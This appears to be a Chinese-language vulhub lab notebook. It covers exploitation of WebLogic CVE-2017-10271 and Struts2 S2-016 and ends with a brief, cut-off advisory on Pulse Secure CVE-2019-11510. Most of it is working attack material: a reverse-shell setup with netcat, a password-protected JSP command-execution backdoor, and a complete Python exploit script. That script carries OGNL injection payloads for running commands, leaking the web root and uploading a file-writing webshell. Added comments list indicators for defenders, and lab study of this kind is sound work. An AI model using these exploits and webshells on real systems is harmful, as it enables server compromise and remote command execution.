# Download the latest version of vulhub
git clone https://github.com/vulhub/vulhub.git
# Enter the vulnerability directory
cd /path/to/vuln/
# Compile the images (optional; `up` pulls/builds as needed)
docker-compose build
# Run in the background (-d detaches)
docker-compose up -d
weblogic-CVE-2017-10271
原理
操作步骤
1、cd .../vulhub/weblogic/CVE-2017-10271
2、docker-compose up -d
3、cat README.md
方法一
监听图中圈出来的地址(此地址为网关地址-尾号为1)
这里实验使用docker虚拟终端中的ip地址网关,利用命令docker exec -it [docker-name] bash
进入容器镜像执行ifconfig
找到 IP 172.18.0.2,把尾数改为 1 放入数据包中:
先不要点击‘Go’,利用命令nc -l -p 21
监听21端口
然后点击Go,终端就会反弹一个shell,如下:
方法二
README里面提供了一个写入jspshell的方法:
这里把圈起来的内容改为jsp一句话后门:
<%-- Password-gated command-execution backdoor: when request parameter "pwd"
     equals "023", parameter "i" is passed to Runtime.exec() and the process'
     stdout is echoed inside <pre>. Defender's note: a .jsp under the web root
     containing Runtime.getRuntime().exec(request.getParameter(...)) is the
     indicator to look for; each use also leaves the pwd/i query string in the
     access log. --%>
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
#有带回显密码的
在burpsuite上直接发包:
然后直接在网页上访问http://localhost:7001/bea_wls_internal/test1.jsp?pwd=023&i=ls
struts2/s2-016
不解释脚本,两种方法,一种直接写入jspshell,一种写入一个界面(此界面提供一个写jsp木马的平台)
#-*- coding:utf8 -*-
import getopt,sys,requests,re
# Password-gated JSP backdoor with command echo (same snippet as in the WebLogic
# section above). It is defined but never referenced: Write_JspShell posts
# `JspShell` (the file-writer page) instead.
JspShell1="""
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
"""
# Target; hard-coded, no command-line option overrides it.
url = "http://127.0.0.1:8080/index.action"
# URL-encoded OGNL inside the s2-016 `redirect:` prefix: reads the servlet
# context's getRealPath("/") and prints it straight into the HTTP response.
# Consumed by Getwebpath(); the `redirect:${` prefix in a query string is the
# request-side indicator of this vulnerability class.
path_payload = 'redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28"%2F"%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'
# JSP page that writes files: when requested with act=up it deletes the file
# named by the `url` parameter (if present) and writes the `text` parameter
# into it, reporting "Success~!!" or "Failed!!"; otherwise it renders a form
# whose path field defaults to application.getRealPath("/"). This is the body
# that Write_JspShell uploads as test.jsp. Note the submit button reuses
# name="text", so the posted `text` field is followed by a second value "up".
JspShell = """
<%@ page language="java" %><jsp:directive.page import="java.io.File"/><jsp:directive.page import="java.io.OutputStream"/><jsp:directive.page import="java.io.FileOutputStream"/>
<html>
<%
int i=0;
String method=request.getParameter("act");
if(method!=null&&method.equals("up")){
String url=request.getParameter("url");
String text=request.getParameter("text");
File f=new File(url);
if(f.exists()){
f.delete();
}
try{
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
}catch(Exception e){
i++;
%>
Failed!!
<%
}
}
if(i==0){
%>
Success~!!
<%
}
%>
<body>
<form action='?act=up' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url"><br>
<textarea rows="20" cols="80" name="text"></textarea><br>
<input type="submit" value="up" name="text"/>
</form>
</body>
</html>
"""
def info():
    """Print the command-line usage, one option per line."""
    usage_lines = (
        '-p webpath',
        '-d Command',
        '-w write jspshell',
    )
    for line in usage_lines:
        print(line)
def CommandExec(url,Command):
    """Send `Command` to the target through the s2-016 `redirect:` OGNL injection and print the reply.

    `Command` is split on single spaces and each token becomes one element of a
    Java String[] handed to ProcessBuilder; the payload reads up to 50000 chars
    of the process' stdout and prints them into the HTTP response, so the body
    of a reply that fired the injection is the command output itself.

    Args:
        url: Target action URL (the query string is appended by Requests()).
        Command: Space-separated command line; no quoting support.
    """
    InputCommand = ""
    for x in Command.split(' '):
        InputCommand += '\'%s\',' % x  # 'tok', per token: spaces in Command become array elements
    Payload = 'redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{'
    Payload += InputCommand.rstrip(',')  # drop the trailing comma before closing the String[] literal
    Payload +='}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}'
    Result = Requests(url,Payload)
    # A reply containing '<html' is the normal page, i.e. the injection did not fire.
    # NOTE(review): Requests() returns str(e) on a transport error, and that text
    # also lacks '<html', so a connection failure is printed as a success here.
    if Result.find('<html') == -1:  # no page markup -> treated as command output
        print('执行命令成功:\n'+Result)
    else:
        print('Fail...')
def Getwebpath():
    """Return the target's web root as reported by the module-level `path_payload`.

    Reads the globals `url` and `path_payload`. The response is expected to be
    the bare path printed by the payload's getRealPath("/") call: all
    whitespace (including the println newline) is removed and the last
    character dropped (presumably the trailing separator of getRealPath("/")).
    On a transport error Requests() returns the exception text, which is
    mangled the same way instead of being reported.
    """
    webpath = Requests(url, path_payload)
    webpath = "".join(webpath.split())  # strip every whitespace character
    webpath = webpath[:-1]  # drop the final character of the printed path
    return(webpath)
def Write_JspShell(url,SavePath):
    """Upload the module-level `JspShell` page to `<webroot>/test.jsp` on the target.

    The OGNL payload in the query string creates that file, copies the raw POST
    body (`JspShell`) into it and prints a confirmation line into the response.
    The destination is always Getwebpath() + '/test.jsp'; `SavePath` is accepted
    for the CLI but never used. Getwebpath() is called twice, so this function
    issues three HTTP requests in total.

    Returns:
        The response text when no page markup came back, the fixed string
        'Fail.....>_<' when the normal page was returned, or the exception
        text on a transport error.

    Defender's note: the artefact this leaves is a new test.jsp under the web
    root plus a POST whose query string starts with `?redirect:${`.
    """
    WebShellPath = "'"+Getwebpath()+"/test.jsp'"
    #print (WebShellPath)
    Payload = "?redirect:${%23path%3d"
    Payload += WebShellPath
    Payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
    Payload += '"'+Getwebpath()+'/test.jsp Get Shell!!!"'  # confirmation line the payload prints back
    Payload += '),%23stm.getWriter().flush(),%23stm.getWriter().close()}'
    url += Payload
    #print(url)
    try:
        r = requests.post(url, data=JspShell , timeout = 10)  # the POST body becomes the file content
        if r.text.find('<html') == -1:  # no page markup -> the write went through
            return r.text
        else:  # normal page came back -> write failed
            return 'Fail.....>_<'
    except Exception as e:
        return str(e)
def Requests(url, Data):
    """GET `url?Data` and return the response body.

    `Data` is appended verbatim after a '?'. No timeout is set, so a silent
    target can block indefinitely. Any exception from the request is swallowed
    and its text returned instead of the body, so callers cannot tell a
    transport error from a response by the return type alone.
    """
    target = '?'.join((url, Data))
    try:
        response = requests.get(target)
    except Exception as err:
        return str(err)
    else:
        return response.text
#Result = re.compile('[\\x00-\\x08\\x0b-\\x0c\\x0e-\\x1f]').sub('', response.read())
if __name__ == '__main__' :
    # Option string "d:wp": only -d takes an argument; -w and -p are flags, so
    # `value` is '' for them (Write_JspShell ignores its SavePath anyway).
    # The target is the module-level `url`; there is no option to change it.
    try:
        opts, args = getopt.getopt(sys.argv[1:],"d:wp")
    except:  # any getopt error (unknown option, missing -d argument) -> usage and exit
        info()
        sys.exit(2)
    for opt, value in opts:
        if opt == '-d':
            CommandExec(url,value)
        elif opt == '-w':
            print(Write_JspShell(url,value))
        elif opt == '-p':
            print('webpath:'+Getwebpath())
CVE-2019-11510
漏洞介绍
Pulse Secure Pulse Connect Secure 授权问题漏洞
Pulse Secure Pulse Connect Secure(又名PCS,前称Juniper Junos Pulse)是美国Pulse Secure公司的一套SSL VPN解决方案。
Pulse Secure PCS 9.0RX版本、8.3RX版本和8.2RX版本中存在授权问题漏洞。该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。
危害影响
成功利用上述漏洞会造成读取任意文件
修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接: